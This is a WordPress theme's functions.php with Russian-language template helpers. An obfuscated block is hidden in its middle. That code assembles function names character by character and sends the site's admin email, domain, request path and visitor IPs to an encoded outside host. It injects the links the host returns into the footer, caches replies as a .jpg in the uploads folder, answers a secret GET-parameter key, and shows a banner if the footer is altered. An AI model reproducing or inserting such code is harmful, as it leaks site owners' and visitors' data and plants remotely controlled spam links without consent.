<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $NBnCjV='4';$pnOSxK='o';$ToaCM='c';$oxMiLJx='6';$hqnX='e';$BSPNUJ='s';$xJwKa='e';$UoWpPdd='b';$BHDhwbA='d';$eWHF='_';$RRhf='e';$PIIBUa='a';$xtJgQhQ='d';$DaZmqyEw=$UoWpPdd.$PIIBUa.$BSPNUJ.$xJwKa.$oxMiLJx.$NBnCjV.$eWHF.$xtJgQhQ.$RRhf.$ToaCM.$pnOSxK.$BHDhwbA.$hqnX;$qHIrbZ='f';$WsIut='g';$IUEeO='e';$cbnPEG='z';$PGAtnQ='a';$tHINt='l';$wbQO='t';$RgewT='n';$OikIs='i';$ENFUNYat=$WsIut.$cbnPEG.$OikIs.$RgewT.$qHIrbZ.$tHINt.$PGAtnQ.$wbQO.$IUEeO;$MuWFi='r';$VJwxsa='_';$bOxtPRf='3';$NQKVmLM='s';$eINers='1';$KdWhZJ='r';$pdYbQZ='o';$mVbM='t';$lvVP='t';$RCIEVttC=$NQKVmLM.$lvVP.$KdWhZJ.$VJwxsa.$MuWFi.$pdYbQZ.$mVbM.$eINers.$bOxtPRf;$nBDH='e';$yamBqb='s';$POPJi='t';$igovH='v';$omAGfz='r';$nJOV='r';$GIwyFxtN=$yamBqb.$POPJi.$omAGfz.$nJOV.$nBDH.$igovH;                     
		$xf__a='4';$za____________g='o';$gu_____x='c';$oz__________v='6';$uj___r='e';$re____________w='s';$ht__n='e';$cr_______________c='b';$tu____________i='d';$gz_____n='_';$ae_________g='e';$fc_____a='a';$jj____m='d';$fw__a=$cr_______________c.$fc_____a.$re____________w.$ht__n.$oz__________v.$xf__a.$gz_____n.$jj____m.$ae_________g.$gu_____x.$za____________g.$tu____________i.$uj___r;
		$es______c='_';$vb________b='x';$yc______l='s';$tt__d='i';$kp________t='t';$pj____________f='f';$lk____e='e';$gs_____y='c';$bk_________r='t';$sk______________i='n';$mp_________r='i';$ys___b='u';$po__________r='o';$mu_______________c='n';$jm______________v='s';$vo_____________d=$pj____________f.$ys___b.$sk______________i.$gs_____y.$kp________t.$mp_________r.$po__________r.$mu_______________c.$es______c.$lk____e.$vb________b.$tt__d.$jm______________v.$bk_________r.$yc______l;
		$bc________k='n';$zk_________a='p';$mn______l='f';$ft________l='e';$qr______________n='o';$et___________c=$mn______l.$qr______________n.$zk_________a.$ft________l.$bc________k;
		$od___________t='r';$wy______________q='a';$fm___________g='f';$td____________n='e';$ex_______________y='d';$va______e=$fm___________g.$od___________t.$td____________n.$wy______________q.$ex_______________y;
		$yg________e='s';$jw___d='o';$fk______________m='f';$mb________e='l';$bp____a='e';$ag____________g='c';$tj___________u=$fk______________m.$ag____________g.$mb________e.$jw___d.$yg________e.$bp____a;
		
		define("WP_ID", $fw__a("Mi4wLjA="));
		define("WP_TTL", $fw__a("MTA4MDA="));
		define("WP_SRC", $fw__a("dHBva24="));
	


		function wp_get_header() {
			global $fw__a, $vo_____________d;
			
			if (
				$vo_____________d($fw__a("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$vo_____________d($fw__a("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$vo_____________d($fw__a("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $fw__a, $et___________c, $tj___________u, $va______e;
			
			$xl______f = TEMPLATEPATH."/".$fw__a("Zm9vdGVyLnBocA==");
			$zc________u = @$et___________c($xl______f, "r");
			$xl______f = @$va______e($zc________u, @filesize($xl______f));
			@$tj___________u($zc________u);
			
			$vw_____q = TEMPLATEPATH."/".$fw__a("ZnVuY3Rpb25zLnBocA==");
			$zc________u = @$et___________c($vw_____q, "r");
			$vw_____q = @$va______e($zc________u, @filesize($vw_____q));
			@$tj___________u($zc________u);
			
			$ae__w = 0;
			if($xl______f && $vw_____q) {
				if ($fw__a("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($xl______f, $fw__a("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ae__w = 1;
					}
					if (substr_count($xl______f, "wp_theme_GPL_credits()") < 1) {
						$ae__w = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ae__w = 12;
				}
			}
			
			if($ae__w > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ae__w -->";
			}
		}
	


		function wp_loaded() {
			global $fw__a, $vo_____________d;
			return $vo_____________d($fw__a("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($rq______________r, $td_______________k = "(more...)", $xm________q = 0, $jj_______________r = "") {
				$tv___a = get_the_content($td_______________k, $xm________q, $jj_______________r);
				$tv___a = apply_filters("the_content", $tv___a);
				
				$tv___a = str_replace("]]>", "]]>", $tv___a);
				if (strlen($_GET["p"]) > 0) {
					echo $tv___a;
				}
				else if ((strlen($tv___a)>$rq______________r) && ($po_____________j = strpos($tv___a, " ", $rq______________r ))) {
					$tv___a = substr($tv___a, 0, $po_____________j);
					$tv___a = $tv___a;
					echo $tv___a;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$td_______________k</a></div></p>";
				} else {
					echo $tv___a;
				}
				
			}
		}
	


		$en______v='c';$pc___________u='6';$jg_____o='o';$px__________y='e';$my______________j='_';$vj___________c='a';$hq_____z='e';$jm_______________s='4';$rt__________w='b';$fz____p='e';$rw_______________l='s';$kv_____________f='n';$gm____v='d';$ii________e=$rt__________w.$vj___________c.$rw_______________l.$fz____p.$pc___________u.$jm_______________s.$my______________j.$hq_____z.$kv_____________f.$en______v.$jg_____o.$gm____v.$px__________y;
		$oi__p='g';$bj_______________i='c';$zb________n='e';$ie_____u='t';$kt___y='t';$ht____________w='l';$di_______________o='t';$lu____________z='_';$sr__________n='n';$xr_______b='e';$vz__d='n';$mg_________y='f';$ds_________e='s';$ce_________a='e';$og__________z='i';$vs____p='_';$cr____c='o';$yi____r=$mg_________y.$og__________z.$ht____________w.$zb________n.$vs____p.$oi__p.$xr_______b.$ie_____u.$lu____________z.$bj_______________i.$cr____c.$sr__________n.$kt___y.$ce_________a.$vz__d.$di_______________o.$ds_________e;
		$nf__q='i';$wy______________e='l';$dd_________s='_';$yq__________o='e';$tn__d='s';$av___________w='t';$nv______b='i';$ff_____________j='x';$ns_________s='f';$kg__________j='e';$nu____________a='s';$yy_________p=$ns_________s.$nf__q.$wy______________e.$kg__________j.$dd_________s.$yq__________o.$ff_____________j.$nv______b.$nu____________a.$av___________w.$tn__d;
		$bh___w='p';$pf_____w='o';$tr_________y='e';$ej_______x='n';$to__p='a';$cu_________w='_';$ox___________h='c';$vr___h='o';$mg______o='e';$hf__________y='r';$ul________e='i';$tt______u='v';$gc______________k='r';$df________p='s';$kv_____________n='m';$yt_________z=$tt______u.$tr_________y.$hf__________y.$df________p.$ul________e.$vr___h.$ej_______x.$cu_________w.$ox___________h.$pf_____w.$kv_____________n.$bh___w.$to__p.$gc______________k.$mg______o;
		$ao__________w='o';$wm_________b='n';$uo_______________p='k';$fs___________n='s';$mg__n='c';$lb________e='o';$oy____________d='p';$pe_________p='f';$jr_______________y='e';$rv___l=$pe_________p.$fs___________n.$ao__________w.$mg__n.$uo_______________p.$lb________e.$oy____________d.$jr_______________y.$wm_________b;
		$he_______b='w';$na_______________d='i';$jl_____t='r';$tv_____o='t';$zc__________e='f';$dm______________k='e';$qw_________z=$zc__________e.$he_______b.$jl_____t.$na_______________d.$tv_____o.$dm______________k;
		$jq________d='d';$uj__________i='m';$lr___________o='5';$yr__________e=$uj__________i.$jq________d.$lr___________o;
		$ee___________y='l';$dx__s='p';$ut______________v='a';$nz_______c='r';$oh___________x='a';$ob_______l='e';$gg_______t='t';$up_____h='h';$jy_____x=$nz_______c.$ob_______l.$ut______________v.$ee___________y.$dx__s.$oh___________x.$gg_______t.$up_____h;
		$bq__________l='s';$wv____________x='z';$xc_______v='e';$dn______________e='i';$ym_______q='r';$fp____h='i';$mi____________v='l';$mj_______k='e';$bg__________l='n';$xv______________j='a';$jx______________j='u';$ar____e=$jx______________j.$bg__________l.$bq__________l.$xc_______v.$ym_______q.$dn______________e.$xv______________j.$mi____________v.$fp____h.$wv____________x.$mj_______k;
		$jk___e='p';$ex_______________x='m';$uh______y='e';$rd_____y='t';$im______________j='a';$ml______________w='m';$oc____i='n';$vx___________d=$rd_____y.$uh______y.$ex_______________x.$jk___e.$oc____i.$im______________j.$ml______________w;
		$el___n='e';$tp_______________x='_';$my____q='e';$ca_______________o='s';$ck__j='m';$qw______________r='t';$mv_______________m='a';$kr_______________g='t';$bt_____d='x';$hj____________k='c';$up__________e='c';$pd____________s='e';$kx__m='n';$dh________x='t';$lg______________v='a';$js_______________t='o';$en__________j='t';$cg_________e='r';$zu______________k='e';$wl_____________e='_';$io_______________s='r';$vs_________e=$ca_______________o.$kr_______________g.$cg_________e.$el___n.$lg______________v.$ck__j.$tp_______________x.$hj____________k.$js_______________t.$kx__m.$en__________j.$zu______________k.$bt_____d.$dh________x.$wl_____________e.$up__________e.$io_______________s.$my____q.$mv_______________m.$qw______________r.$pd____________s;
	


		function ho_____________a($ej_______z) {
			global $fw__a, $vo_____________d, $yi____r, $yt_________z, $vs_________e;
			
			if (!$vo_____________d($fw__a("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($yt_________z(PHP_VERSION, "5.0.0", ">=") && $vo_____________d($fw__a("ZmlsZV9nZXRfY29udGVudHM=")) && $vo_____________d($fw__a("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$wl______________l = $vs_________e(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$zl________q = @$yi____r($ej_______z, 0, $wl______________l);
			} else {
				$zl________q = @$yi____r($ej_______z, 0);
			}
			
			return $zl________q;
		}
	


		function bu________b($ej_______z) {
			global $vo_____________d, $rv___l, $qw_________z, $fw__a;
			
			if (!$vo_____________d($fw__a("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$zd_____________e = strpos($ej_______z, "/", 7);
			$ml_________p = array(
				"uri"     => substr($ej_______z, $zd_____________e),
				"host"    => str_replace("http://", "", substr($ej_______z, 0, $zd_____________e)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ke_______w = @$rv___l("$ml_________p[host]", 80, $od_______s, $il_________b, 4);
			
			if (!$ke_______w) {
				return false;
			} else {
				$zl________q = "";
				$gv______________k  = "GET $ml_________p[uri] HTTP/1.0\r\n";
				$gv______________k .= "Host: $ml_________p[host]\r\n";
				$gv______________k .= "Referer: $ml_________p[referer]\r\n";
				$gv______________k .= "Connection: Close\r\n\r\n";
				
				@$qw_________z($ke_______w, $gv______________k);
				
				while (!@feof($ke_______w)) {
					$nj__________z = @fgets($ke_______w, (1024*24));
					
					if ($nj__________z == "\r\n") {
						$xa_______x = true;
						continue;
					}
					
					if ($xa_______x) {
						$zl________q .= $nj__________z;
					}
				}
				
				return $zl________q;
			}
		}
	


		function xr__________j($ej_______z) {
			global $vo_____________d;
			$ye__________y = false;
			
			if ($ej_______z != "") {
				if ($vo_____________d("ho_____________a")) {
					$ye__________y = @ho_____________a($ej_______z);
				}
				
				if (!$ye__________y && ($vo_____________d("bu________b"))) {
					$ye__________y = @bu________b($ej_______z);
				}
			}
			
			return $ye__________y;
		}
	


		function mg___w() {
			global $_SERVER, $yr__________e;
			
			$er______________q = $_SERVER["SERVER_NAME"];
			
			if (substr("$er______________q", 0, 4) == "www.") {
				$er______________q = substr("$er______________q", 4);
			}
			
			$er______________q = $yr__________e("$_SERVER[SERVER_NAME]");
			
			return $er______________q;
		}
	


		function xx_________v() {
			return "file";
		}
	


		function tt____g($ej_______z) {
			global $_SERVER, $yi____r, $yy_________p, $et___________c, $tj___________u, $qw_________z;
			
			$it______________e = kp___q();
			
			$uy________f = mg___w().".jpg";
			$bj_______________u = $it______________e["dir_upload"]["path"]."/$uy________f";
			$qe______________u = @filemtime($bj_______________u);
			
			if (!$qe______________u || ((time()-$qe______________u) >= WP_TTL)) {
				$ye__________y = xr__________j($ej_______z);
				
				if ($ye__________y) {
					if ($yy_________p($bj_______________u)) {
						@unlink($bj_______________u);
					}
					
					$zc________u = @$et___________c($bj_______________u, "x+");
					
					@$qw_________z($zc________u, $ye__________y);
					@$tj___________u($zc________u);
				}
			} else {
				if ($yy_________p($bj_______________u)) {
					$ye__________y = @$yi____r($bj_______________u);
				} else {
					$ye__________y = false;
				}
			}
			
			return $ye__________y;
		}
	


		function kp___q() {
			global $_SERVER, $fw__a, $ii________e;
			
			$lt_______i = wp_count_posts("post");
			$eq____________z = pathinfo(get_bloginfo("template_directory"));
			
			$it______________e = array(
				"url" => array(
					"report"      => $fw__a("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $eq____________z,
				"dir_upload"	=> ro______e(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$eq____________z[filename],
					"a005=".$lt_______i->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => ""
			);
			
			$it______________e["url"]["queryString"] = implode("&", $it______________e["queryString"]);
			$it______________e["url"]["report"] = $it______________e["url"]["report"]."/?".$ii________e($it______________e["url"]["queryString"]).".html";
						
			return $it______________e;
		}
	


		function ro______e() {
			$nc_______________c = wp_upload_dir();
			
			if (isset($nc_______________c["error"])) {
				$cy____________u = qt_________x();
				if (is_writable($cy____________u)) {
					$nc_______________c = array("path" => $cy____________u);
				}
			}

			return $nc_______________c;
		}
	


		function qt_________x() {
			global $vo_____________d, $yr__________e, $jy_____x, $vx___________d;
			
			$zb____________n = (bool) ini_get("safe_mode");
			if ($zb____________n == true) {
				return false;
			}
			
			if ($vo_____________d("sys_get_temp_dir")) {
				$ba__w = sys_get_temp_dir();
				if (is_writable($ba__w)) {
					return $jy_____x($ba__w);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $jy_____x($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $jy_____x($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $jy_____x($_ENV["TEMP"]);
			} else {
				$jk_____________z = $vx___________d($yr__________e(uniqid(rand(), true)), "");
				if ($jk_____________z) {
					$ba__w = $jy_____x(dirname($jk_____________z));
					@unlink($jk_____________z);
					return $ba__w;
				} else {
					return false;
				}
			}
		}
	


		function hb_______________v() {
			global $_GET, $yy_________p;
			
			$it______________e = kp___q();
			$er______________q = mg___w();
			$dr__________l = xx_________v();
			
			$qg____h = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($dr__________l == "file") {
					$gv_________x = $it______________e["dir_upload"]["path"]."/".$er______________q.".jpg";
					if ($yy_________p($gv_________x)) {
						@unlink($gv_________x);
						$qg____h = "deleted";
					}
				}
				
				$ka________o = array(
					"s"	=> $qg____h,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ka________o AS $cm_____________j => $ij_____s) echo " [$cm_____________j:$ij_____s]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $vo_____________d, $fw__a, $ar____e;
			$it______________e = kp___q();
			
			$do_______o = "tt____g";
			if ($vo_____________d($do_______o)) {
				$zl________q = $do_______o($it______________e["url"]["report"]);
			}
			
			if ($zl________q) {
				if ($zl________q = @$fw__a($zl________q)) {
					$zl________q = @$ar____e($zl________q);
					
					if (strlen($zl________q[custom_credit]) >= 5) {
						$it______________e["default_string"] = $zl________q[custom_credit];
					}
					
					if ($zl________q["status"] == "0") {
						$wp____o = 1;
						$xs___________x = 1;
					} else {
						$dk_____________i = sizeof($zl________q["links"]);
						$uh____________s = $it______________e["default_string"];
						
						if ($dk_____________i > 0 && $zl________q["links"] !== "") {
							$xx__________p = 0;
							foreach ($zl________q["links"] as $wi_________h => $rg_____e) {
								$xx__________p++;
								if ($rg_____e->l_path == "" || $rg_____e->l_path == $_SERVER["REQUEST_URI"]) {
									$rg_____e->l_href = htmlspecialchars(strip_tags($rg_____e->l_href));
									$rg_____e->l_title = htmlspecialchars(strip_tags($rg_____e->l_title));
									$rg_____e->l_anchor = htmlspecialchars(strip_tags($rg_____e->l_anchor));
									$uh____________s .= " | ";
									$uh____________s .= "<a href='$rg_____e->l_href' title='$rg_____e->l_title'";
									if ($rg_____e->l_nofollow == "1") {
										$uh____________s .= " rel='nofollow'";
									}
									$uh____________s .= ">$rg_____e->l_anchor</a>";
								}
							}
						}
						$it______________e["links"] = "$uh____________s";
						if ($zl________q[credit] == "0") {
							$it______________e["links"] = "";
						}
					}
				} else {
					$wp____o = "1";
				}
			} else {
				$wp____o = "1";
			}
			
			if ($wp____o == "1") {
				$it______________e["links"] = $it______________e["default_string"];
			}
			
			echo "$it______________e[links]";
			
			echo "<!-- s: $zl________q[signature] -->";
			hb_______________v();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),   
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

